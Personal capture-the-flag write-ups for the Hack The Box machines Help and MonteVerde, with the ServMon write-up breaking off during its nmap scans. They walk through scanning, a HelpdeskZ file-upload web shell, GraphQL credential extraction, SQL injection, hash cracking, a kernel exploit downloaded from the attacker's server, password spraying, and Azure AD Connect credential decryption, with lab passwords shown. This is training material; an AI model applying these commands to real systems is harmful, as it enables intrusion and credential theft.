Write-Up on Emil Pawlak

Help

EmilPawlak@protonmail.com (Emil Pawlak) — 18.04.2026

Enumeration

nmap

As usual I start with a nmap scan that runs in the background.

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 15:37 CEST
Nmap scan report for 10.129.230.159
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/18%OT=22%CT=1%CU=37591%PV=Y%DS=2%DC=I%G=Y%TM=69E3891
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=108%TI=Z%
OS:CI=Z%II=I%TS=A)SEQ(SP=108%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2S
OS:T11NW7%O2=M4E2ST11NW7%O3=M4E2NNT11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M
OS:4E2ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y
OS:%T=40%W=FAF0%O=M4E2NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.55 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 15:37 CEST
Nmap scan report for help.htb (10.129.230.159)
Host is up (0.029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp

Nmap done: 1 IP address (1 host up) scanned in 10.43 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 15:37 CEST
Nmap scan report for help.htb (10.129.230.159)
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1009.37 seconds

I inputted the ip into the browser, it changed into “help.htb” domain so I added it into my /etc/hosts file. Running nmap scan shows that there are 3 ports opened - 22, 80 and 3000. HTTP shows a default apache2 page. Port 3000 shows a JSON file with a message “Hi Shiv, To get access please find the credentials with given query”.

I ran a directory scan on both ports ffuf -u http://help.htb:3000/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and checked for any subdomains with ffuf -u http://help.htb:3000/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.help.htb" -fs 81.

I found additional subdirectories on port 80:

server-status
javascript
support

I also tried out feroxbuster with feroxbuster -u http://help.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --filter-status 404 --dont-filter command.

ffuf showed me that there is a support directory which hosts helpdeskz, forexbuster also showed me that there is an upload page on it. I looked online and with defaultcreds (creds search helpdesk) but I didn’t find anything for this ticketing dashboard.

Foothold

Searchsploit shows that there is some arbitrary file upload public exploit, I will check it out. I can’t find what version I’m using but this exploit works on helpdeskz’s version 1.0.2 - https://www.exploit-db.com/exploits/40300.

I found this python port of this exploit - https://github.com/trevlee/helpdeskz_exploit

I tested this exploit a few times and looked around other forks of it - there is some nuance to it.

Firstly, you need to provide a “baseUrl” for the exploit. I assumed that “base” url would be “http://help.htb/support" in that case, but that’s not true. When I ran a script I never got any successful hits with it. Then I thought that maybe it expects the form URL with all it’s GET parameters like http://help.htb/support/?v=submit_ticket&action=displayForm but it had an opposite effect - everything was a false-positive.

Then I was reading some fork version of the script and noticed that author was accessing http://help.htb/support/uploads/tickets/ which finally worked.

Another issue was the shell’s file. When I attempted to attach a .php shell or similar the form always thrown out an error. The only format it seemed to accept was .txt which redirected me out. I doubled my extensions like so .php.txt and it seemed to go through but the exploit never saw those shells. Only after I while I randomly tried to catch a failed form with a plain .php extension and it worked. Seems like the form doesn’t really discard those forms - crazy logic error.

azaeir@parrot (~/Desktop/htb/machines/help/helpdeskz_exploit): python3 exploit http://help.htb/support/uploads/tickets/ shell.php 
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://help.htb/support/uploads/tickets/bd42427925a14e4cf6e46a11468bc98c.php

I also couldn’t make a reverse shell work so instead I just uploaded a simple php web shell. With it I got access as the help user and got a user flag.

I decided to try the revshell route again and first I got a never before seen error about a detection of a server side request forgery, but after I refreshed it worked.

Account is in some interesting groups uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)

Looking around the filesystem I didn’t find anything interesting besides the help’s directory so I dug deeper into it. In /home/help/help/src I found what looks to be the source of the message from port 3000. It asked me to use a query to look for credentials so I ran grep -rni "pass" . and I found this information

./graphql/schema/resolvers/index.js:1:const user = { username:'helpme@helpme.com', password:'5d3c93182bb20f07b994a7f617e99cff' }
./graphql/schema/types/user.graphql:4: password: String

I tried to use those credentials on the only login form I know so on port 80 but it didn’t work - same goes for ssh.

From what I’m checking it seems like the software on 3000 Express powered by Node.js running GraphQL. GraphQL is the key part here, it allows me to talk to the servers database. Think of this setup like a normal SQL (preferably MySQL) database. To talk with GraphQL you need to call it and request specific data from its entry points and need to follow syntax.

So, I could use BurpSuite or some tools that help with graphql but I decided to use curl here.

The intended way to get this data was likely to query the server with GraphQL. Keeping that MySQL analogy in mind, to first know what databases there are. If a server or a company is big there might be multiple databases, but here there is only one so we can skip this aspect.

After databases, I would like to know what tables are in that database, this can be done with such command:

azaeir@parrot (~): curl -X POST http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{"query":"{ __schema { types { name } } }"}'
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}% 

The important part is in the -d flag. Inside, there is a JSON enveloped GraphQL query which asks the database (__schema) what tables are there ({ types { name } }) inside of it.

Seeing the output I can see a number of “tables”. Schema and default ones are usually prefixed with __. From that output I see a “table” named “Users” and I would like to access it. Problem is, I don’t know the structure inside of it. To enumerate it, I can just the below command. Remember, that the important part is inside the -d flag:

azaeir@parrot (~): curl -X POST http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{"query":"{ __type(name:\"User\") { fields { name } } }"}'
{"data":{"__type":{"fields":[{"name":"username"},{"name":"password"}]}}}% ```

This output shows me, that there is a “username” and “password” column - or an entry point.

Now, knowing what columns I can query, I can search for that with this command:

azaeir@parrot (~): curl -X POST http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{"query":"{ user { username password } }"}'
{"data":{"user":{"username":"helpme@helpme.com","password":"5d3c93182bb20f07b994a7f617e99cff"}}}% 

Anyway, as the message said “To get access please find the credentials” and I got the credentials I need to think for what those creds could be. I already checked the helpdeskz and ssh, but my correct suspicion is that they are likely for the express database itself. Express is however just an HTTP server. It natively doesn’t have a built-in authentication system so my only way in could still be GraphQL queries.

I wanted to authenticate with GraphQL but there looking at my previous output there is no “Mutations” table. Which would be needed for API to accept any credentials in the first place. I though about other possible ways to authenticate to Express and I thought that my password might be in fact an MD5 hash. I ran it though hashcat with -m 0 and to my silly surprise it is. the password in reality is “godhelpmeplz”.

This credentials worked on the helpdeskz platform this time. Inside, I can see a new tab “My Tickets” but it and all other tabs don’t show any new data.

That new tab requires me to input a ticket id and search. Maybe there is like an “IDOR” vulnerability for it. It’s not really an idor but I digress. I opened this site with burp, created a small wordlist with number using for i in {0..10000}; do echo "$i"; done > numbers.txt; and looked for website size difference. There was just one difference for id 0 but it was just another error. I realized that those ids are not simple number but are encoded same as I did in my foothold - #6DA-F2B-8D321 etc.

Privilege Escalation

I remembered when looking for helpdeskz exploits to file upload I stumbled upon SQL injection. I have a feeling that it could be my way into priv-esc. This repo seems like will work. It also mentions the correct version. I followed the steps from the repository I got a few errors like this:

(myvenv) azaeir@parrot (~/Desktop/htb/machines/help/HelpdeskZ-Authenticated-SQL-injection): ./helpdeskz-sql-injection.py "http://help.htb/support/" "helpme@helpme.com" "godhelpmeplz"
(+) Csrfhash: "7a42706d1baa866ce4216464bb815971" .
(+) Ticket link: "http://help.htb/support/?v=view_tickets&action=ticket&param[]=9" .
(-) Failed to fetch the full vulnerable url.
(-) This may be due to an existing ticket's lack
(-) lack of file attachment.
(-) Delete file-less ticket and create one with 
(-) a file attached to it!
(-) Response:
b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 

But it just turned out that I need to create a ticket as an authenticated user. When I ran the above command again I got admin credentials - admin:d318f44739dced66793b1a603028133a76ae680e. Interestingly, this repo seems to be using error based sql injection and from the looks of it, it was created specifically for this box which kinda defeats the purpose of using it.

I ran the admin’s password hash through hashcat, first with just hashcat admin.hash /usr/share/wordlists/rockyou.txt and then hashcat -m 100 admin.hash /usr/share/wordlists/rockyou.txt when I learned that it’s SHA1 - admin:Welcome1.

I use the admin credentials to ssh into the host but it didn’t work, I also tried it on helpdeskz and same results. I used variants with and without the domain to no avail. I decided to run the script again and guess other columns like “email” and “id”. I found an email support@mysite.com but it still doesn’t work.

I took a break and came back with new power. I decided to go over my linux priv-escalation before i run linPEAS.

With uname -a I got information about the linux and with searchsploit 4.4.0-116 I noticed that there is a local privilege escalation vulnerability related to this kernel version.

I found this article that talks about an exploit. I followed the steps mentioned there and just slightly adjusted the recommendations. I download the exploit with searchsploit -m linux/local/44298.c. Then i compile it with gcc -static 44298.c -o exploit.c. -static also compiles the exploit with all libraries it might need. I start a python server python3 -m http.server 1338. Look for a directory where I’m able to download the exploit. I can in cd /tmp. I download the exploit with wget http://10.10.15.189:1338/exploit.c. Make it executable with chmod +x exploit.c. And run ./exploit.c.

With these steps I get a root shell and find the root flag in their home directory.

Closing Thoughts

Help shows a number or niche techniques and pivoting options, it keeps on showing interesting attack vectors but doesn’t become annoying or unnecessary complicated at any point. It’s fun and enjoyable through the whole time. It also has a few ways to be solved which is always fun to try after the initial root. At some points there is an opportunity for some minor rabbit holes - which I of course found - but it was a good reminder to not be afraid to go a few steps back and double-check your notes.

MonteVerde

EmilPawlak@protonmail.com (Emil Pawlak) — 17.04.2026

Enumeration

nmap

I ran a nmap scan and there are typical AD related ports open.

nmap scan results

Nmap scan report for 10.129.228.111
Host is up (0.029s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-16 20:44:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2026-04-16T20:44:45
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.13 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-16 22:45 CEST
Nmap scan report for 10.129.228.111
Host is up (0.029s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49693/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 114.87 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-16 22:47 CEST
Nmap scan report for MEGABANK.LOCAL (10.129.228.111)
Host is up (0.031s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

Nmap done: 1 IP address (1 host up) scanned in 28.08 seconds

nmap also shows the domain name - MEGABANK.LOCAL. I added it into my /etc/hosts file.

Quick checks

I checked smb for null session and it connects but fail - netexec shows that it throws an “access denied” error. I tried a rid brute attack and guest’s account seems to be disabled.

With dig reading the SOA records I found out that the domain controller’s domain is “monteverde.MEGABANK.LOCAL” - I also added it into my file.

ldapsearch

Luckily anonymous ldapsearch works so with the ldapsearch -x -H ldap://10.129.228.111 -b "DC=MEGABANK,DC=LOCAL" command I was able to dump a ton of data. I scoped it in with ldapsearch -x -H ldap://10.129.228.111 -b "DC=MEGABANK,DC=LOCAL" "(objectClass=user)" sAMAccountName cn mail.

Users:

Common names:
AAD_987d7f2f57d2
Mike Hope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
Dimitris Galanos
Ray O'Leary
Sally Morgan

sAM names:
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

I made a wordlist with those sam names and ran it against kerberos with impacket tools. Firstly I want to check for any as-rep roastable users as this doesn’t require valid credentials. To check for it I ran GetNPUsers.py MEGABANK.LOCAL/ -usersfile users.txt -no-pass.

[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set

Sadly all users require pre authentication meaning they are not vulnerable.

I will now try to bruteforce some common passwords against my user list with netexec smb 10.129.228.111 -u users.txt -p /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt.

I had it running in the background for a while but it failed and timed out. I suspect that if it was the meant pathway it would fine the password much quicker.

Foothold

I went back on my steps looking for anything I might’ve missed and I again started to bruteforce. This time I created a custom list having data of users, their username variants and the domain name and I got one hit - SABatchJobs:SABatchJobs. I checked those credentials with netexec and they work with smb, wmi and ldap. I ran netexec smb 10.129.228.111 -u 'SABatchJobs' -p 'SABatchJobs' --shares to see what I can access now.

[*] Enumerated shares
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
azure_uploads READ 
C$ Default share
E$ Default share
IPC$ READ Remote IPC
NETLOGON READ Logon server share 
SYSVOL READ Logon server share 
users$ READ 

There are some custom shares which are interesting. I reviewed all that I could read and I only found “azure.xml” in the users$ share. From what I gathered this is a serialized Azure AD credential object and it stores a password for something, I assume some service, let’s find out - 4n0therD4y@n0th3r$.

With netexec smb 10.129.228.111 -u users.txt -p 4n0therD4y@n0th3r$ I found it belongs to mhope. I got smb, winrm, ldap and wmi access.

I checked the smb access and there was nothing new that SABatchJobs didn’t see. I looked into the account with evil-winrm and found the user’s flag on the Desktop. I then looked around and found an .Azure folder which seems interesting but before I check it out more in depth I will run bloodhound to gather as much data about the AD as I can. bloodhound-python -u mhope -p '4n0therD4y@n0th3r$' -d MEGABANK.LOCAL -dc monteverde.MEGABANK.LOCAL -ns 10.129.228.111 -c all; rusthound-ce -d MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$' --zip -c All

With it I didn’t find much, however I noticed that mhope is a part of a “AZURE ADMINS@MEGABANK.LOCAL” group which seems pretty out of place. And it’s also kinda weird because it doesn’t seem to have any interesting permissions.

In .Azure folder I found Azure related files. These files seem to be used by Azure to store cached sessions and tokens, so users can stay signed in without re-entering credentials.

I gathered some basic data about the user of this session:

"User": { 
"Name": "John Clark", 
"UPN": "john@a67632354763outlook.onmicrosoft.com", 
"IP": "46.4.223.173" 
}

From what I gathered this seems to be kinda like opening old tmux sessions. I can use Get-AzContext and see that there is some session as the John user.

Privilege Escalation

I’m not super familiar with actually testing Azure. Because of that I stepped back and read about it. Here are some good reads: adamtheautomator.com Github - andreipintica labs.reversec.com

I looked for ways to exploit azure, some of them mentioned the use of mimikatz but I wasn’t able to lunch it on the target host. I tried to use Set-ExecutionPolicy Bypass -Scope Process but it didn’t work.

Found this great read or possible exploits of Azure AD Connect. I considered Azure AD Connect because of the weird “AAD_987d7f2f57d2” account and tried to understand what is it related to. Tried adconnectdump but it didn’t work. Likely because lack of access of mhope to RPC. Tried AdSyncDecrypt. At first *Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:/Users/mhope/Desktop/AdDecrypt/AdDecrypt.exe didn’t work but *Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:/Users/mhope/Desktop/AdDecrypt/AdDecrypt.exe -FullSQL did - I guess AD Connect just used the full db here. For it all to work I just had to follow instructions from the git repo so I recommend checking it out.

With this, I now have decrypted admin credentials:

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!

I blindly tried them out with evil-winrm and they worked. I found a root flag on the Desktop.

Closing Thoughts

MonteVerde is a pretty straightforward machine, it shows a niche technique of privilege escalation with Azure AD Connect but besides it, it’s pretty typical in terms of pivoting, enumeration, and gaining the foothold. Still, there aren’t many boxes that touch Azure so it was really interesting to explore it.

For me personal lessons learned: I need to keep practicing not splitting my attention on different possible vectors and try to feel and have an instinct what could be the expected path of attack - KISS.

ServMon

EmilPawlak@protonmail.com (Emil Pawlak) — 16.04.2026

Enumeration

nmap

I start with a nmap scan - sudo nmap -sC -sV -Pn -O ; sleep 5; sudo nmap -p- -Pn; sleep 5; sudo nmap -sU -Pn

nmap scan results

Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst: 
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
| GetRequest, HTTPOptions, RTSPRequest: 
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo: 
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL: 
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
| fingerprint-strings: 
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest: 
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.95%I=7%D=4/14%Time=69DE257A%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=4/14%Time=69DE2582%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
SF:8\x1b\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.
SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R
SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen
SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length
SF::\x2018\r\n\r\nDocument\x20not\x20found");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/14%OT=21%CT=1%CU=35362%PV=Y%DS=2%DC=I%G=Y%TM=69DE25E
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=102%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=104%GCD=1%ISR
OS:=10F%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS
OS:=S%TS=U)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M4E2NW8
OS:NNS%O2=M4E2NW8NNS%O3=M4E2NW8%O4=M4E2NW8NNS%O5=M4E2NW8NNS%O6=M4E2NNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M4E2NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2026-04-14T11:32:53
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.15 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 13:33 CEST
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 26.55 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 13:33 CEST
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 993 closed udp ports (port-unreach)
PORT STATE SERVICE
